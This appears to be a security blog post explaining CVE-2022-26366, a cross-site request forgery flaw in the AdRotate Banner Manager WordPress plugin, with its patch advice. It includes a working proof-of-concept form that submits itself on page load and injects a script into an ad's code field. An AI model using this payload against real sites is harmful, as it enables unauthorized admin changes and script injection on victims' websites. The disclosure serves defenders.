In today’s post, we’ll take an exclusive deep dive into CVE-2022-26366, a Cross-Site Request Forgery (CSRF) vulnerability discovered in the super-popular AdRotate Banner Manager plugin, affecting all WordPress websites running versions up to 5.9. This flaw allows attackers to make changes to your AdRotate settings or insert malicious ads—without your consent—using a simple trick. We’ll explain the vulnerability, show how a potential attack could work, and guide you through preventing this on your website.
What is CSRF? A Quick Refresher
CSRF, or Cross-Site Request Forgery, is an attack where a bad actor tricks a logged-in user into submitting a request they didn’t intend to, by forging a clickable link or hidden form. If your site doesn’t check for a proper CSRF token (a random, unique string that verifies intent), attackers can use this trick to change settings, post content, or even delete stuff—if your account allows it.
What is AdRotate Banner Manager?
AdRotate Banner Manager is a widely used WordPress plugin for managing ads on your website. With over 40,000+ active installs (WordPress plugin page), it lets admins create, display, and track advertising banners.
The Core Issue
Versions of the AdRotate Banner Manager plugin ≤ 5.9 *do not* properly check CSRF tokens in certain admin panel actions, particularly when creating or editing ads or ad groups. If you’re an authenticated user (say, you’re logged into your site as admin and visit a malicious site), *that* site can send hidden requests to your own server without your knowledge, changing your AdRotate settings.
No CSRF Token → No Protection
A key part of WordPress security is the _wpnonce token, or “nonce,” which is meant to ensure that changes are only made by users who intend to make them. Without this, it’s open season.
How the Attack Works
Let’s say you’re logged in as an admin to your WordPress dashboard. An attacker tricks you into visiting a malicious site or clicking a crafted email link. The bad page submits a hidden form to your site, making you (unknowingly) submit a change to your AdRotate settings:
Example Exploit Code (HTML + JavaScript)
<form id="evil" action="https://your-wordpress.site/wp-admin/admin.php?page=adrotate-ads&view=edit"; method="POST">
<input type="hidden" name="adrotate_user_action" value="update" />
<input type="hidden" name="adrotate_id" value="1" />
<input type="hidden" name="ad_title" value="Malicious Ad Title" />
<input type="hidden" name="ad_code" value="<script>alert('pwned');</script>" />
<!-- ... insert more POST fields as required ... -->
</form>
<script>
// Automatically submit the form as soon as the page loads
document.getElementById('evil').submit();
</script>
As soon as the page loads, the form is submitted to your WordPress admin panel.
- Since there’s no CSRF protection, your browser (being logged in) sends your session cookies, and the malicious request goes through.
Original References
- WPScan Vulnerability Database: CVE-2022-26366
- NVD (National Vulnerability Database): CVE-2022-26366
- Wordfence Advisory
- Original Plugin Changelog
The Fix
The plugin developers quickly responded and fixed the issue in version 5.9.1 by properly validating CSRF tokens (WordPress nonces) for all relevant actions.
Here’s a code sample (simplified) of how it should look
// Before performing any sensitive action:
if (isset($_POST['_wpnonce']) && wp_verify_nonce($_POST['_wpnonce'], 'adrotate_action')) {
// Safe to proceed
// ... code to update or insert ad ...
} else {
die('Unauthorized action!');
}
The patch ensures every request comes from a real admin user, not from a rogue website.
Final Words
CVE-2022-26366 is a perfect reminder that even well-reviewed plugins can have dangerous vulnerabilities if they miss basic security steps like CSRF protection. If you run AdRotate, double-check your plugin version and update today.
Resources
- Official AdRotate Plugin Page
- WPScan CVE-2022-26366
- CVE on NVD
Timeline
Published on: 11/30/2022 13:15:00 UTC
Last modified on: 12/02/2022 15:10:00 UTC